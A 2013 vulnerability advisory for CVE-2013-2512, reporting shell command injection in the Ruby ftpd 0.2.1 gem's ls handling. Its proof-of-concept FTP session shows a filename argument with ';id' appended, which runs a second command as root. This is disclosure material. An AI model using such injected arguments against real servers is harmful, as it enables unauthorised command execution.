Title: Remote command execution for Ruby Gem ftpd-0.2.1 |
Author: Larry W. Cashdollar, @_larry0 |
Date: 2013-02-18 |
[CVE-2013-2512] |
Download Site: http://rubygems.org/gems/ftpd |
Vendor: |
Vendor Notified: 2013-02-18 |
Vendor Contact: https://github.com/wconrad |
Advisory: http://www.vapid.dhs.org/advisories/ftp-0.2.1-remote-exec.htmlhttp://www.vapid.dhs.org/advisories/ftp-0.2.1-remote-exec.html |
Description: ftpd is a pure Ruby FTP server library. It supports implicit and explicit TLS, passive and active mode, and most of the commands specified in RFC 969. It an be used as part of a test fixture or embedded in a program. |
Vulnerability: The ls interface can have commands injected into it if option or filename contain the shell character ; The example.rb server listens to localhost only which I used to test the ftp library. But if this gem is used normally it could be configured to listen on 0.0.0.0.
PoC:
for this to work the file must exist in the CWD.
ftp> root@ubuntu:/tmp# sh /tmp/connect-to-example-ftp-server.sh
Connected to localhost.
220 ftpd
Name (localhost:root):
331 Password required
Password:
230 Logged in
Remote system type is UNIX.
Using binary mode to transfer files.
* I created the filename adfasdf
ftp> ls adfasdf;id
200 PORT command successful
150 Opening ASCII mode data connection
-rw-r--r-- 1 root root 0 Mar 2 05:52 adfasdf
uid=0(root) gid=0(root) groups=0(root)
226 Transfer complete
ftp> |
Export: JSON TEXT XML |
Exploit Code:
|
Screen Shots: |
Notes: 90784 |